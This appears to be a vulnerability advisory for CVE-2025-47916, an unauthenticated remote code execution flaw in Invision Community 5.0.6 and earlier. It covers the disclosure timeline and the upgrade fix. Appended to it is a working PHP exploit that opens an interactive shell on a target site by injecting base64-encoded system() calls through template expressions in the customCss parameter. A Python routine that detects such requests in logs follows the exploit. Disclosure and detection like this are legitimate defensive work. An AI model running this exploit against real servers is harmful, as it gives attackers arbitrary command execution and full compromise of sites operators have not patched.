---------------------------------------------------------------------------
Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability
---------------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

All versions from 5.0.0 to 5.0.6.

[-] Vulnerability Description:

The vulnerability is located in the /applications/core/modules/front/system/themeeditor.php script, specifically in the IPS\core\modules\front\system\themeeditor::customCss() method. This protected method can be invoked by unauthenticated users, and it passes the value of the "content" request parameter to the Theme::makeProcessFunction() method. As a result, the input is processed by the template engine. This behavior can be exploited by unauthenticated attackers to inject and execute arbitrary PHP code by supplying crafted template strings.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2025-47916.php

Packet Storm Note: PoC appended below

[-] Solution:

Upgrade to version 5.0.7 or later.

[-] Disclosure Timeline:

[10/05/2025] - Vendor notified
[12/05/2025] - Version 5.0.7 released
[12/05/2025] - CVE identifier requested
[14/05/2025] - CVE identifier assigned
[14/05/2025] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2025-47916 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://invisioncommunity.com/release-notes-v5/507-r41/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2025-02

---- proof of concept ----

\n";
    print "\nExample....: php $argv[0] http://localhost/invision/";
    print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
    die();
}

$ch = curl_init();
$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];

curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

while (1) {
    print "\ninvision-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
    preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
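A defender-side triage routine, added here and not part of the advisory or of the Invision Community code base: it matches logged requests against the app/module/controller/do parameters of the customCss route named above and flags a "content" value that carries the {expression=...} template tag the PoC relies on, which a plain CSS submission never contains. The sample requests are constructed; treating GET query strings the same as POST bodies is an assumption.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Route parameters of the unauthenticated customCss() entry point named in
# the advisory (the same app/module/controller/do values the PoC posts).
CUSTOMCSS_ROUTE = {"app": "core", "module": "system",
                   "controller": "themeeditor", "do": "customCss"}

# The PoC smuggles PHP through an {expression="..."} template tag; the regex
# tolerates whitespace and case variations around the tag name.
TEMPLATE_TAG = re.compile(r"\{\s*expression\s*=", re.IGNORECASE)

# Constructed sample requests as a reverse proxy or WAF might log them
# (method, URL-encoded query string or POST body). Not real traffic.
SAMPLE_REQUESTS = [
    # template tag in the CSS field: the pattern the advisory describes
    ("POST", "app=core&module=system&controller=themeeditor&do=customCss"
             "&content=%7Bexpression%3D%221%2B1%22%7D"),
    # ordinary CSS submitted to the same endpoint
    ("POST", "app=core&module=system&controller=themeeditor&do=customCss"
             "&content=body%7Bcolor%3Ared%3B%7D"),
    # unrelated request, should be ignored
    ("GET", "app=core&module=system&controller=login"),
]


def classify_request(method: str, query_or_body: str) -> Optional[dict]:
    """Return a finding for requests that reach themeeditor::customCss(),
    or None for anything else. Query strings and POST bodies are parsed
    the same way (assumption: the dispatcher accepts either)."""
    params = {k: v[0] for k, v in
              parse_qs(query_or_body, keep_blank_values=True).items()}
    if any(params.get(k) != v for k, v in CUSTOMCSS_ROUTE.items()):
        return None
    content = params.get("content", "")
    if TEMPLATE_TAG.search(content):
        return {"severity": "high", "method": method,
                "reason": "template tag in customCss content"}
    # Reaching the endpoint at all is worth a look on unpatched (<= 5.0.6)
    # installs, since it needs no authentication.
    return {"severity": "info", "method": method,
            "reason": "customCss endpoint reached"}


def triage(requests):
    """Run classify_request over (method, data) tuples, dropping non-matches."""
    return [f for f in (classify_request(m, d) for m, d in requests) if f]
```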